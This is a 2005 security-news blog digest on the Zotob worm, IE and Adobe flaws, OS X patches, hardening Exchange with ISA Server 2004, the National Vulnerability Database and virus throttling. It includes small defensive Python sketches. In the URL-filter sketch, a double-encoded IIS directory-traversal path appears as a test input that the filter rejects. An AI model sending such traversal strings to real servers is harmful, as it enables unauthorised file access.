Sunday, August 21, 2005

Experts divided on Microsoft worm threat

Security experts are divided over the effects of the latest rash of worms that exploit a vulnerability in Microsoft's Plug-and-Play software.

Ten malware programs that exploit the vulnerability have been detected so far. These have caused problems for large corporates and individuals worldwide, but Kaspersky, one of the first antivirus vendors to detect the new malware, insists that there is little to worry about.

"There has not been any noticeable increase in network activity that could be ascribed to this worm," said the company in a statement.

"During the Sasser epidemic in May 2004, Sasser caused an increase in network traffic of approximately 20 to 40 per cent. At the moment, there are no signs of a similar increase. This would seem to confirm that, at the moment, there is no epidemic."

But Kaspersky is something of a lone voice calling for calm.

"The Zotob Worm is being underestimated," said network security specialist Arbor Networks.

"We have received calls from a number of large companies that have been devastated by Zotob. Because additional variants of the worm have been released, and the most recent one spreads through email, this has the potential to become a much bigger problem for companies."

A patch to secure PCs against the new malware has been available from Microsoft since August 9.

Adobe warns over PDF peril

Adobe has issued updates to guard against a buffer overflow vulnerability in various versions of its popular Acrobat and Reader software packages. The security bug, which stems from an unspecified boundary error in the core application plug-in, might be used to inject hostile code into vulnerable systems by tricking potential victims into opening a maliciously constructed PDF file.
"If the vulnerability were successfully exploited, the application could crash with an increased risk of arbitrary code execution," Adobe warns. Security clearing house Secunia describes the software flaw as critical. Adobe Reader users on Windows or Mac OS are advised to upgrade to version 7.0.3 or 6.0.4. Acrobat users on Windows or Mac OS are urged to adopt version 7.0.3, 6.0.4 or 5.0.10. Linux or Solaris users of Adobe Reader should step up to version 7.0.1.®

Exploit for unpatched IE vuln fuels hacker fears

Microsoft is investigating an IE security bug amid fears that a hacker attack based on the vulnerability is imminent. A flaw in Microsoft DDS Library Shape Control COM object (msdds.dll) is at the centre of the security flap.
Security researchers warn that msdds.dll might be called from a webpage loaded by Internet Explorer and crash in such a way that allows hackers to inject potentially hostile code into vulnerable systems. That's because IE attempts to load COM objects found on a web page as ActiveX controls, as is the case with msdds.dll, even though the object was never designed to be used in this way. So hackers might be able to take control of systems by tricking users into visiting a maliciously constructed web site. US-CERT warns that exploit code to do this is already available, but Microsoft said it's not aware of any attacks.

No patch is available but Microsoft has posted a bulletin detailing possible workarounds. These include disabling ActiveX controls, setting the kill bit for msdds.dll and unregistering msdds.dll. Use of an alternative browser (such as Firefox or Opera) is also an option.
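For illustration, setting a kill bit comes down to a single registry value under HKEY_LOCAL_MACHINE, as documented in Microsoft Knowledge Base article 240797. The Python sketch below shows the mechanism; the CLSID is a placeholder, not the real identifier for msdds.dll, which is listed in Microsoft's advisory:

    # Minimal sketch: set the ActiveX "kill bit" so IE refuses to instantiate
    # a COM class (see Microsoft KB240797). Must be run as Administrator.
    import winreg

    # PLACEHOLDER CLSID -- substitute the one from Microsoft's msdds.dll advisory.
    CLSID = "{00000000-0000-0000-0000-000000000000}"
    KEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" + "\\" + CLSID

    with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
        # 0x400 is the kill bit: IE will not load the control even if the
        # DLL is later re-registered.
        winreg.SetValueEx(key, "Compatibility Flags", 0, winreg.REG_DWORD, 0x400)

Unregistering the DLL (regsvr32 /u msdds.dll) stops it loading too, but the kill bit survives a later re-registration, which is why the bulletin lists both workarounds.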

Msdds.dll is a .NET component not loaded onto Windows by default. But the COM object is reportedly installed as part of the following products: Microsoft Office XP, Microsoft Visual Studio .NET 2002, Microsoft Visual Studio .NET 2003 and Microsoft Office Professional 2003. That means there'll be a large number of potentially vulnerable systems.

The SANS Institute's Internet Storm Centre has upped its alert status to yellow because of concerns that "widespread malicious use of this vulnerability is imminent". The vulnerability was publicly disclosed by FrSIRT based on information it received from an anonymous source. Microsoft has criticised the "irresponsible" way the vulnerability came to light. ®

Tuesday, August 16, 2005

IRC bot latches onto Plug-and-Play vuln

The Microsoft Plug-and-Play vulnerability exploited by the ZoTob worm has been harnessed to create an IRC bot. IRCBot-ES uses the vulnerability to spread instead of more common vectors such as Windows RPC security vulns.
The attack provides evidence that virus writers are swarming around the vulnerability - which was only disclosed last week - thinking up new ways to attack vulnerable systems. Early indications are that IRCBot-ES may be more potent than ZoTob because it's easily capable of spreading around internal networks once an infected machine is plugged into a LAN. Anti-virus firm F-Secure reports that one organisation has suffered widespread infection from IRCBot-ES via this mechanism. Meanwhile a further variant of ZoTob has been discovered.

The clear interest from malware authors in the vulnerability underlines the need for Windows users to get patched up sooner rather than later. ®

Apple patches OS X security flaws

Apple has posted its latest Mac OS X security update, which addresses a number of potential vulnerabilities in the operating system.
Included among the patches are repairs to AppKit that prevent malicious users from exploiting buffer overflows via carefully crafted .rtf and .doc files to execute malware stored within those files or to add extra user accounts to the system.

In the Safari web browser, forms presented using the XSL format are now correctly submitted, preventing the data from potentially being sent to another web site. Safari is now protected against malicious .rtf and .pdf documents too.

Mail no longer loads remote images when the user tries to print or forward an HTML-formatted message, unless the user allows it to do so in the appropriate preferences setting.

A tweak to Mac OS X's Bluetooth code ensures devices' requirement for an authenticated connection is correctly reported. The HIToolbox human interface API has been patched to prevent the VoiceOver accessibility app from reading out the contents of secure text-entry fields such as passwords.

The LoginWindow app, which handles user logins and accounts, has been fixed to prevent a local user who knows the password for two accounts from being able to log into a third account without knowing the password. PasswordAssistant, Mac OS X's password generator, has been patched to prevent it showing recently generated - and thus potentially used - passwords.

Kerberos has been updated to fix a number of buffer overflow vulnerabilities that could result in denial of service, remote compromise of a KDC or a compromise to the root account. The Directory Services code has been patched to prevent buffer overflows and to block security flaws within the privileged tool dsidentity.

A couple of buffer overflow and "algorithmic complexity attack" vulnerabilities have been patched in the OS' CoreFoundation code.

Apache 2 for Mac OS X Server 10.3.9 has been updated to version 2.0.53m, fixing a number of buffer overflow issues, and the code has been further tweaked to prevent access to Mac OS X's folder-state files and resource forks.

Other tweaks focus on MySQL, OpenSSL, CUPS, X11, zlib, servermgrd, servermgr_ipfilter, ping, traceroute, QuartzComposerScreenSaver and SquirrelMail. Full details of the patches applied can be found here.

Two separate updates are available, one for Mac OS X 10.4.2 and the other for 10.3.9. Both are further subdivided into client and server versions:

* Mac OS X 10.4.2 client

* Mac OS X 10.4.2 server

* Mac OS X 10.3.9 client

* Mac OS X 10.3.9 server

The updates are also available through Software Update. ®

Monday, August 15, 2005

Worm spreading through Microsoft Plug-and-Play flaw

A worm started spreading on Sunday using a flaw in the Windows operating system's Plug-and-Play functionality, according to two security groups, who advised users to update systems using a patch released by Microsoft five days ago.


“ Zotob is not going to become another Sasser. ... The majority of Windows boxes on the Net won't be hit by (the worm). ”

F-Secure's Virus Labs' blog

The worm, dubbed Zotob by antivirus firm F-Secure, started spreading early Sunday morning, according to a statement posted by the company. The security firm did not post any additional information about the extent of the digital epidemic, however.

F-Secure's researchers do not believe that the worm will widely infect computer systems.

"Zotob is not going to become another Sasser," F-Secure's researchers said on the virus lab's blog. The worm does not infect computers running Windows XP Service Pack 2 nor Windows 2003, as those systems are somewhat protected against the Windows Plug-and-Play vulnerability. Machines that block port 445 using a firewall will also not be vulnerable, the company said. "As a result, the majority of Windows boxes on the Net won't be hit by (the worm)," the blog stated.

The worm is the first major program since Sasser to spread by targeting a vulnerability in Microsoft Windows. The Sasser worm started spreading on April 30, 2004, using a vulnerability in a Windows component known as the Local Security Authority Subsystem Service, or LSASS. While it's unknown how far Sasser spread, a week into the outbreak Microsoft said that 1.5 million users had downloaded a cleaning tool for the worm. The earlier Blaster worm had infected about 10 million users, according to Microsoft estimates.

The Zotob worm uses a flaw in Microsoft Windows' Plug-and-Play capabilities, which the software giant had patched five days before, on August 9. The worm compromises systems by sending data on port 445. If a computer is infected with the program, the worm starts a file-transfer protocol (FTP) server and attempts to spread further, according to an analysis by the Internet Storm Center, a group of volunteers who monitor network threats on behalf of the SANS Institute.

The group received reports of the worm as early as 7:30 a.m. EST, according to the ISC's daily diary.

On Friday, the Internet Storm Center upgraded its threat level for the Internet to yellow, because three different groups had published code for taking advantage of the Windows Plug-and-Play flaw to compromise Windows machines. Windows 2000 systems are especially vulnerable to the exploits.

Microsoft's investigation into the worm indicated that it only infects Windows 2000 systems.

"Microsoft’s investigation into this malicious act is ongoing so that we can continue to understand how we can help support customers," the company stated in an advisory posted Sunday. "We are working closely with our anti-virus partners and aiding law enforcement in its investigation."

The company verified that any system patched by its update released last Tuesday will not be infected by the worm.

Sunday, August 14, 2005

Securing Exchange With ISA Server 2004

Running Exchange Server 2003 exposed directly to the Internet may be tempting, but you should be concerned about the security implications of doing so: there are many attacks and automated scripts in the hands of hackers that pound on Exchange machines and attempt to compromise them. Outlook Web Access can be a useful option, but there are security issues with deploying this as well. And the fact remains that sometimes you absolutely need to provide full access for Microsoft Outlook clients, and the Web Access front-end just won't cut it.

This article will highlight the security issues involved with providing Outlook Web Access or full Outlook client connections over the Internet, and then discuss how Microsoft's new ISA Server 2004 can be configured to mitigate these threats. We'll start with Outlook Web Access (OWA) as the simplest solution.

Before we begin, however, please note that this article does not focus on securing the Exchange message transfer agent (MTA) itself; instead, we will look only at how to secure remote access to Exchange services from a user's perspective.
Securing Outlook Web Access with ISA 2004
Some of your users might be able to get away with just using Outlook Web Access, the great tool that mimics Outlook's interface in a web browser, in lieu of the traditional Outlook client. OWA is good for Exchange organizations because web browsers are prevalent, affording your users more opportunities to check e-mail while they're away from their desk. As well, the user interface is familiar to your users, so there is very little learning curve involved.

However, there are qualms about Outlook Web Access in regard to security. How might one go about securing it? OWA can use HTTPS [ref 1] -- the secure, tunneled version of the HTTP protocol -- but it lacks any intrusion detection features. More problematically, all versions of OWA but the most recent lack a session timeout feature, so clients remain logged into their OWA session until they click the logout button. Picture an airport Internet kiosk, and your chief financial officer checking his e-mail through OWA. He simply closes the browser when he is finished, but a clever information spy can then re-open the browser after he has walked away, revisit the previous site, and gain access to a very sensitive and important e-mail account. That is certainly a very bad situation, and it's happened before.
The need for ISA 2004
To make OWA secure, there are four things that an administrator must do:

* Inspect all SSL traffic at the application layer to make sure the traffic is what it claims to be. This prevents a significant portion of today's attacks.
* Maintain wire privacy, as sensitive information is very often transmitted through e-mail.
* Enforce the HTTP and HTML standards to make sure that nefarious code doesn't sneak through via weaknesses in these protocols and standards.
* Block URL-based attacks by enforcing only known URLs. This protects you against attacks that request unusual actions, have a large number of characters, or are encoded using an alternate character set.

All in all, when you have this quadruple-layered security scenario protecting OWA, you can feel reasonably confident that data entrusted to OWA's mechanisms is secure.

Enter ISA Server 2004, which can help you enforce the above requirements. When you put ISA Server in front of your OWA front-end server or servers, there are numerous benefits. The ISA Server in effect becomes the bastion host, terminating all connections with its Web Proxy feature, decrypting HTTPS to inspect the content of the packets transmitted through the machine, enforcing known-URL access with URLScan, and ultimately re-encrypting everything for transmission to the OWA server, living safely behind the ISA frontline machine.
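As a rough illustration of the known-URL idea, the sketch below accepts only whitelisted verbs and path prefixes and rejects over-long or oddly encoded requests. The paths shown are typical OWA virtual directories; the specific limits and checks are assumptions for illustration, not URLScan's actual rule set:

    # Conceptual sketch of known-URL enforcement -- not ISA/URLScan's implementation.
    ALLOWED_VERBS = {"GET", "POST"}
    ALLOWED_PREFIXES = ("/exchange/", "/exchweb/", "/public/")
    MAX_URL_LENGTH = 256     # assumed limit, for illustration

    def request_permitted(verb, path):
        if verb not in ALLOWED_VERBS:
            return False                 # unusual actions are refused
        if len(path) > MAX_URL_LENGTH:
            return False                 # suspiciously long URLs are refused
        if "%u" in path.lower():
            return False                 # alternate character encodings are refused
        return path.startswith(ALLOWED_PREFIXES)

    print(request_permitted("GET", "/exchange/inbox"))       # True
    print(request_permitted("GET", "/scripts/..%255c../"))   # False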
Pre-authentication of connections
ISA 2004 also provides another benefit: pre-authentication of connections. Here's how that works: the ISA Server actually hosts the forms that a user is used to seeing -- such as the login screen. This screen queries the user for her credentials, and once the user enters them into the form, ISA verifies them against Active Directory. Note that RADIUS is also supported, so even ISA machines that do not trust or are not members of a domain can do this pre-authentication. ISA then takes the result of that verification and embeds the credentials into the actual HTTP headers of the packets that it forwards to the front-end OWA server, so the user doesn't get a second prompt. In effect, the ISA server is vetting your users with an actual OWA form, ensuring they are who they say they are, and actually authenticating them at the perimeter of your network, before the packets ever hit the OWA server.
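The mechanics are easy to picture. In the hypothetical sketch below, a proxy verifies the submitted form credentials first and only then builds the Authorization header it forwards to the back-end server; check_credentials() stands in for ISA's Active Directory or RADIUS lookup:

    # Conceptual sketch of perimeter pre-authentication -- not ISA's actual code.
    import base64

    def check_credentials(username, password):
        # Placeholder for a directory lookup (Active Directory, RADIUS, ...).
        return (username, password) == ("alice", "s3cret")

    def build_forward_headers(username, password):
        if not check_credentials(username, password):
            raise PermissionError("authentication failed at the perimeter")
        # Embed the verified credentials in the forwarded HTTP request so the
        # back-end OWA server doesn't prompt the user a second time.
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        return {"Authorization": "Basic " + token}

    print(build_forward_headers("alice", "s3cret"))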
More information on how you would configure this environment is available as a step-by-step document from Microsoft. [ref 2] Tom Shinder also has a great reference for configuring firewall publishing rules to allow external access to OWA sites at ISAServer.org. [ref 3]
Issues with the Outlook Client and VPN
VPN clients, present in all versions of Windows, are the typical choice for anyone needing to provide full Outlook client functionality to users across the Internet. However, VPN security leaves a lot to be desired, at least out of the box: while PPTP can be made secure, doing so requires an extensive knowledge of both the machines running the VPN software (a feat not always possible when you're dealing with your users' home machines) and a deep familiarity with encryption techniques and settings. Of course, there are also logistical hurdles to jump through when using a VPN: it simply won't work in some public locations because firewalls block the needed ports, and packet fragmentation causes problems for IPsec and L2TP across the Internet. And finally, while VPNs are useful tools to connect remote clients to corporate networks, they are less useful for connecting from a corporate network to an application service provider (ASP) that might be running your Exchange servers for you.

So therein lies the problem: how does one provide secure access to an Exchange server for remote users while not making those users jump through hoops to get access to their groupware application? The best answer to this may be to deploy a machine running Microsoft Internet Security and Acceleration Server 2004.
Securing the Outlook client with Exchange 2003 RPC and ISA 2004

The grim reality is that people have grown at best accustomed to, and at worst absolutely dependent on, full Outlook client functionality. For example, suppose your corporation has standardized on LookOut, the popular Outlook search plug-in, or perhaps you have a third-party calendaring and agenda plug-in. You might also require the ability to synchronize your mailbox with a handheld PDA-like device, or your users might need Outlook 2003's ability to work seamlessly offline, with full Outlook functionality even when not connected to an Exchange server. Your front-line customer service users may depend heavily on custom functionality offered by client-side rules, or your organization may require its users to take advantage of a standard, business-wide address book.
Security features in Exchange 2003
Exchange 2003 itself has made great strides in this area, enabling new functionality called RPC-over-HTTP. RPC-over-HTTP is a beneficial addition to the product, because it allows RPC requests to be encapsulated in the HTTP protocol, for which most firewalls are already configured and allow access. RPC-over-HTTP depends on an element of Exchange 2003 called the RPC proxy, an ISAPI extension running in IIS (actually on a front-end Outlook Web Access server) that sets up an RPC session after authentication. Essentially, the Outlook client connects to this filter using RPC-over-HTTP, and the filter terminates the "over-HTTP" portion of the connection, takes out the RPC requests, and passes them back to the Exchange server.

However, RPC-over-HTTP isn't a panacea. It only supports basic HTTP authentication, so you need to make sure the HTTP connection uses SSL. Also, there is no support for SecurID, and the limitation here is two-fold. For one, there is no dialog within Outlook 2003 to ask for the SecurID PIN from the user's device. And secondly, Exchange has no built-in, direct ability to proxy authentication requests to an RSA ACE server rather than to Active Directory. RADIUS authentication is also not possible with RPC-over-HTTP, nor is the use of client certificates in most cases. So, while RPC-over-HTTP solves some configuration problems and some legitimate security problems, there remain other issues to address.
ISA 2004 and the Exchange RPC Filter
ISA 2004 comes bundled with the Exchange RPC Filter, which takes the good parts of the RPC Proxy element that is included with the raw Exchange 2003 product to allow RPC-over-HTTP connections, and then marries them with a certain intelligence about how Exchange does its business. The Exchange RPC filter is programmed to know how Exchange RPC connections are established and what the proper format for that protocol is. It also allows only Exchange RPC UUIDs to be transmitted, all the while enforcing client authentication and requiring encryption.

Here's how it works:

* The client connects to the Exchange RPC filter's quasi-portmapper. This piece of the puzzle really isn't a portmapper -- it just acts like one, which reduces the attack surface by only responding to requests for Exchange-based RPC.
* Once the connection is established, the ISA Server returns the filter's Exchange RPC port numbers. Remember, the client is connecting to the filter, which then uses the RPC proxy element in Exchange 2003 itself, so the client never directly touches the Exchange server during this stage.
* The client, filled with knowledge about the location of RPC ports, logs onto Exchange. During this process, Exchange refers the logon to Active Directory, which makes the final decision on whether the user is authenticated or not.
* The RPC filter on the ISA Server is monitoring this process the whole time, waiting for the approval from AD that the user is valid. Once it sees that approval, the filter makes sure that the connection is using encryption (if you specify that you want to require it), and then the client sees his mailbox open.

It's also important to note that the entire process just outlined is transparent from the client's perspective. Users see a username and password prompt when they open Outlook away from the corporate network, but once they enter those credentials, there is a delay of roughly five seconds and then the mailbox opens. Thus, this solution passes the first litmus test of all security solutions -- make it easy for the user to do things securely.

This solution also protects you from various RPC-based attacks. For example, the ISA RPC filter is immune to reconnaissance attacks and denial of service attacks against the RPC portmapper. All known attacks fail, but even if an attack were successfully able to penetrate the RPC filter, recall that Exchange is still protected since ISA works at the perimeter to vet your connections before they ever touch your Exchange server. This solution is also impervious to service attacks, mainly because such attacks require reconnaissance information that is unavailable. Also, the back end of this RPC filter connection, the ISA-to-Exchange-Server part of the transmission, simply dies if the first part of the connection (the client to the ISA server) isn't correctly positioned or formatted.

How would you go about deploying this solution? Figure 2 shows an example network diagram, with a standalone ISA 2004 machine in the de-militarized zone (DMZ) protecting the back-end Exchange servers and Active Directory. The ISA Server provides the forms-based authentication for OWA that I discussed in the previous section, and also provides secure RPC access for Outlook clients as well.
Conclusion
Deploying Exchange Server 2003 on the Internet to support remote users can be a daunting task. However, Microsoft has supplied logic within ISA Server 2004 that can intelligently protect and defend your Exchange deployment against attacks, both for users of Outlook Web Access and for other users that require RPC-based access for full Outlook client functionality.

The links provided in the Further Reading section can help you with your implementation plan. Additionally, if you are interested in learning more in-depth information about the ISA Server 2004 product itself, I recommend purchasing Tom Shinder's book, ISA Server and Beyond, available from Syngress [ref 5].

Further Reading

[ref 1] "How to publish an SSL Web site by using SSL tunneling in ISA Server 2004" (Microsoft.com)

[ref 2] "How to publish a Microsoft Exchange server for Outlook Web Access in ISA Server 2004" (Microsoft.com)

[ref 3] "Publishing OWA Sites using ISA Firewall Web Publishing Rules (2004)" (ISAServer.org)

[ref 4] "Using ISA Server 2004 with Exchange Server 2003" (Microsoft.com)

[ref 5] Dr. Tom Shinder's book, "ISA Server and Beyond" (Syngress)

NY enacts security breaches disclosure law

New York has enacted an information security breaches law which will oblige firms and local government agencies to notify customers in the state if their personal information is taken or their systems are hacked into.
The legislation is designed to promote a culture of security. It also helps protect consumers by giving them the information they need to head off possible identity theft when sensitive details such as Social Security, driver's license and credit card numbers become exposed. Organisations with customers in New York are obliged to notify those customers of a breach as soon as practically possible.

The Information Security Breach and Notification Act in New York is broadly similar to security breaches laws enacted in California more than two years ago. Legislation requiring consumer notification of data security breaches has been approved in at least 15 states since then. Federal security disclosure laws are under consideration but opposed by some who fear it might dilute state laws, Red Herring reports.

New York's decision to press ahead with its legislation follows a series of high profile consumer data security breaches involving US firms including data mining firm ChoicePoint, payment processing firm CardSystems Solutions and others.

"The events of the last few months underscore the urgency of protecting consumers. If a person is not aware that he or she has been a victim of identity theft, then the damage done could be severe and irreversible. Prompt notification gives New Yorkers needed protections," said New York State Assembly member James Brennan, who sponsored the law. "In the last year, over 9,000 New Yorkers were exposed to identity theft because of inadequate security and poor notification procedures." ®

AOL raffles spammer's gold bars

AOL is planning to give away assets seized from spammers in a US sweepstake due to launch Wednesday. A 2003 Hummer H2, $75,000 in cash and $20,000 in gold are up for grabs in a give-away of the illicit gains of junk mailing. It's the second time AOL has given away assets confiscated from a spammer. Last year, AOL raffled a $45,000 Porsche Boxster it seized as part of a settlement against another unnamed junk mail scumbag.
"We think it's justice," says Curtis Lu, AOL deputy general counsel, told USA Today. "We're taking the ill-gotten bounty these spammers have earned off the backs of our customers and handing it back to customers."

AOL obtained the gold, cash and car after suing an unnamed New Hampshire penis pill purveyor using the CAN SPAM Act. AOL sued after receiving hundreds of thousands of complaints from members peaking at 100,000 in one day alone in January 2004.

AOL said the sweepstake illustrated that anti-spam laws are an effective weapon in its spam-fighting arsenal alongside email filtering and other technology countermeasures.

Earlier this week former self-styled 'Spam King' Scott Richter agreed to pay Microsoft $7m to settle an anti-spam lawsuit that had brought him and his company OptInRealBig.com to the edge of bankruptcy. ®

NIST, DHS add national vulnerability database to mix

The National Institute of Standards and Technology and the Department of Homeland Security took the wraps off the National Vulnerability Database this week, but questions still remain whether the federal initiative improves upon existing databases or just adds another choice to the current collections of flaws.

“ It is so important for the world to have multiple vulnerability databases, that I think it is great that there is more than one. You never know if funding will get cut off or if one goes under, so I think we should always have more than one. ”

Peter Mell, creator of the NVD and senior computer scientist, NIST

The National Vulnerability Database (NVD) is the latest U.S. Department of Homeland Security initiative to boost the preparedness of the nation's Internet and computer infrastructure, as called for by the Bush Administration's National Strategy to Secure Cyberspace. The strategy's incident response initiative, known as the US Computer Emergency Readiness Team (US-CERT), releases some information on serious vulnerabilities, but little or no information on noncritical vulnerabilities, said Peter Mell, a senior computer scientist at NIST and the creator of the NVD.

"My intention was to publish something on everything else," Mell said. "The mission is for every person in the United States to have information on all the vulnerabilities on their computer systems."

The National Vulnerability Database is managed by NIST but funded through the Department of Homeland Security. The group's staff adds eight new vulnerabilities to the database each day and keeps a variety of current statistics, including a measure of the workload that the release of such flaws has on network administrators.
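NIST does not publish the formula here, but a workload measure of that sort can be pictured as a severity-weighted count of new flaws per day; the sketch below is purely a hypothetical illustration, with weights chosen arbitrarily:

    # Hypothetical illustration only -- NOT NVD's published statistic.
    def workload_index(daily_counts):
        """daily_counts: list of (high, medium, low) tuples, one per day."""
        weights = (1.0, 0.5, 0.25)      # assumed severity weights
        total = sum(h * weights[0] + m * weights[1] + l * weights[2]
                    for h, m, l in daily_counts)
        return total / len(daily_counts)

    # Example: eight new vulnerabilities a day, split across severities.
    print(workload_index([(2, 4, 2)] * 30))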

The creation of the federal collection of flaws comes as security researchers and companies continue to debate the best way to disclose vulnerability information. In July, Cisco and a former researcher for Internet Security Systems resorted to legal maneuvering after the networking giant took exception to researcher Michael Lynn describing a method to run code on Cisco routers. The same month, networking firm 3Com announced it would start buying information about new vulnerabilities from researchers, a controversial business model that few other organizations have adopted.

The National Vulnerability Database avoids much of the controversy by only including public information in its collection of flaws. The project scans the Common Vulnerabilities and Exposures (CVE) list, a listing of serious vulnerabilities maintained by the Mitre Corporation. The NVD expands on the Internet Catalog (ICAT), a previous NIST project that archived the vulnerabilities defined by the Common Vulnerabilities and Exposures list.

The CVE definitions are one of the standards that the National Vulnerability Database depends on, said NIST's Mell. The database also uses the Open Vulnerability and Assessment Language (OVAL) to describe the security issues in a standard language, he said.

The reliance on standards gained the effort some plaudits from representatives of security companies that rely on such databases.

"We believe there is a need in the market for an aggregator to bring together all the information from all the different sources," said Gerhard Eschelbeck, chief technology officer of vulnerability assessment service Qualys. "But we want the organizations to use all the open standards."

Another emerging standard for rating the severity of flaws, known as the Common Vulnerability Scoring System (CVSS), should also be used, Eschelbeck said. Researchers from Qualys, Cisco and Symantec--the owner of SecurityFocus--initially developed the standard, which is now managed by the Forum of Incident Response and Security Teams (FIRST).

While the National Vulnerability Database does not yet use the system, Mell has already contacted US-CERT about adopting it.

"At US-CERT, they are very interested," he said. "They are actually having a meeting to discuss the CVSS soon."

However, adherence to one of the standards, CVE, is not necessarily a plus, said Brian Martin, content manager for the Open-Source Vulnerability Database (OSVDB).

"If a vulnerability is discovered and not in the CVE database, NVD will not contain it either," Martin said. "While CVE is getting a lot better at looking to alternative sources for vulnerability information, they may still miss stuff."

The OSVDB team's goal is to be a comprehensive resource for vulnerability information, he said.

"Even with our very limited volunteer staff and inability to fully keep up with influx of new vulnerabilities, what we lack in thoroughness at this time we make up for in services and diversity," Martin said. "One point that OSVDB has been harping on for the last two years is that it's almost twenty years (after the first database) and the databases are still not evolving," Martin said.

SecurityFocus also maintains a database of vulnerabilities based on, among other sources, its Bugtraq security mailing list. Other security companies maintain their own private databases that they share with customers.

Such databases are not competitors but complementary to the federal effort, said NIST's Mell. The National Vulnerability Database can respond to the needs of government administrators and create a standard for what should be included in such databases, he said.

"It is so important for the world to have multiple vulnerability databases, that I think it is great that there is more than one," Mell said. "You never know if funding will get cutoff or if one goes under, so I think we should always have more than one."

Six patches - three critical - in MS August patch batch

Microsoft's patch bandwagon rolled into town yesterday loaded with three critical updates among a total of six security alerts. A cumulative security update for Internet Explorer (MS05-038), a buffer overflow vulnerability in Windows Plug-and-Play (MS05-039) and a security bug in the Print Spooler service (MS05-043) all pose a severe hacker risk and earn Redmond's dreaded critical sobriquet.
Of particular note is a flaw in IE's JPEG image rendering that creates a means for virus writers to infect vulnerable systems simply by tricking users into viewing a maliciously constructed image. The same IE mega-patch is also designed to address an error in the way COM objects are launched, which could lead to memory corruption problems, and a validation error revolving around the interpretation of certain URLs that creates scripting risks.

That's bad enough but the Plug-and-Play vulnerability is arguably even worse. Security vendor eEye notes that the vulnerability with Windows Plug-and-Play is similar to vulnerabilities historically exploited to create worms such as Blaster and Sasser. Security tools vendor ISS is even more stark in its warning.

"This vulnerability is remotely exploitable in the default configuration of Windows 2000, and is present in all modern Windows operating systems. There is a high probability that this vulnerability will be exploited in an automated fashion as part of a worm on Windows 2000," it said.

The three criticals encompass XP, Win 2003 and Win 2000 so just about everyone running Windows will have some patching work to do. Microsoft also re-released MS05-023 on Tuesday to reflect the fact that Microsoft Word 2003 Viewer is also affected by a vulnerability rated as critical.

Redmond also issued an "important" security update covering a vulnerability in Windows telephony service that could allow remote code execution (MS05-040). Finally we have two "moderate" bulletins covering a DoS risk involving flaws in Windows' Remote Desktop Protocol (MS05-041) and bugs in Microsoft's implementation of the Kerberos security protocol (MS05-042).

US-CERT has produced a useful overview of these various security vulns here. ®

Cabir mobile worm gives track fans the run around

Phone-mad Finns are coping with a minor outbreak of the Cabir mobile virus at the Athletics World Championships in Helsinki this week. Cabir, which infects smartphones running Symbian Series 60 and uses Bluetooth short-range radio communication technology to spread, is flourishing in the packed stadium area. The version of Cabir spreading drains the power of infected phones as it tries to propagate but is otherwise relatively harmless.
"At most we are speaking about dozens of infections, but during a short period and in one spot this is a huge number," Jarmo Koski, a security official at telecoms firm TeliaSonera, told Reuters.

Prospective victims need to accept a download to get hit by Cabir, and security researchers reckon many handsets get infected simply because users get fed up with being prompted to allow a connection. Moving away from an infected phone is an effective defence if a malign connection is attempted in, for example, a bar, but it is harder to apply in a crowded stadium, where perhaps the best approach is to turn off Bluetooth on potentially vulnerable phones.

"This [Cabir spreading] happens easily when you gather tens of thousands of people from all over to world to a very small area. In fact, to some extent the same thing was happening during the Live 8 concerts earlier this summer," said Mikko Hyppönen, director of anti-virus research at Finnish anti-virus firm F-Secure, in a posting on the firm's blog. "We now have staff at the stadium assisting visitors in cleaning out affected phones." ®

Tuesday, August 09, 2005

It's full throttle in the battle against viruses

Richard Brown, team leader at Hewlett-Packard Co.'s laboratory in Bristol, England, is one of the pioneers of a "neighbourhood watch" approach to combatting computer viruses.

About five years ago, in the wake of widespread, nasty infections by the Code Red and Nimda worms, HP Labs began experimenting with new ways to fight computer viruses. One idea was that if all the computers on a business network took small, preventive actions, they could add up to significant overall results.

Traditional antivirus programs look for signatures -- recognizable bits of virus code -- that identify viruses in incoming e-mail or on a computer's hard disk. HP researchers took another tack, aiming to slow the progress of any outbound network traffic that looks like a computer worm or virus trying to spread itself.

The technique, called throttling or traffic shaping, aims not to identify offending programs but to slow their infectious activity across public and business networks. Those experiments are now bearing fruit, and the results are appearing in commercial products aimed at Internet service providers, small and large business servers and even individual PCs.

"In its strongest form, it's just preventing a machine that's infected from infecting anyone else," says Matthew Williamson, an original member of the HP team who is now senior research scientist at Sana Security Inc., in San Mateo, Calif.

Mr. Williamson says the technique of spotting viruses based on a recognizable signature was developed to fight slow-spreading viruses, and isn't a complete solution to today's fast-moving worms. Approaches like throttling that block suspicious behaviour "really are a much more sustainable way of thinking about the arms race."

Throttling basically limits the number of connections that one computer can make to other computers. Throttling might set a limit of one new connection every second, which would have little or no effect on most legitimate programs. A Web browser exchanges many messages with a server as it downloads a Web page, but these are repeat communications with one machine and aren't affected by throttling. The Nimda virus makes up to 400 new connections a second, Mr. Brown says, so throttling slows its spread dramatically.

Throttling does cause outgoing traffic to back up on the infected machine, slowing or stopping legitimate programs' communication, but the virus's self-replicating activities would do that anyway. Meanwhile, this sudden filling up of the outgoing message queue warns that something is amiss, Mr. Brown says, so network security staff can be alerted.
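A minimal sketch of the idea, loosely after Williamson's published "virus throttle" design (the working-set size and release rate here are illustrative assumptions):

    # Repeat traffic to recently contacted hosts passes untouched; connections
    # to new hosts are allowed through at most once per second.
    import time
    from collections import deque

    RECENT_SIZE = 5      # working set of recently contacted hosts (assumed)
    DELAY = 1.0          # at most one new host per second

    recent = deque(maxlen=RECENT_SIZE)
    pending = deque()    # a rapidly growing queue is itself an infection alarm
    last_release = 0.0

    def request_connection(host):
        """Return True if the connection may proceed now, False if delayed."""
        global last_release
        if host in recent:
            return True              # repeat traffic is unaffected
        now = time.monotonic()
        if now - last_release >= DELAY and not pending:
            recent.append(host)      # release one new host, then start timing
            last_release = now
            return True
        pending.append(host)         # a real throttle drains this queue on a timer
        return False

A browser that talks to a handful of servers never notices the limit; a worm asking for hundreds of new hosts a second stalls at once, and the ballooning queue provides exactly the alarm Mr. Brown describes.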

Tom Copeland, president of the Canadian Association of Internet Providers (CAIP), says large ISPs were the early adopters and most have installed throttling capabilities. Now it is starting to filter down to products aimed at businesses.

For example, HP has built throttling capability into its ProLiant servers and ProCurve network switches. Mr. Brown says servers are often the first targets of virus attacks, but "there is no technical reason as far as I'm aware" not to implement throttling on client PCs as well.

